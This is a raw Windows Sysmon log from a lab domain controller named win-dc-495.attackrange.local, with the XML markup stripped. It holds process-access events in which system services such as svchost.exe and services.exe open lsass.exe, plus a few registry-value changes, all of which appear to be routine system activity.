13:33:58.658{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.658{59A5CD1D-8E44-6005-0A00-00000000A301}848944C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.658{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.658{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.658{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.643{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E44-6005-0A00-00000000A301}8481104C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.643{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.643{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.643{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:58.643{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\wcifs\Parameters\WppRecorder_TraceGuid{803cb23a-e32b-4200-bd82-d8a15919ac1b} 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 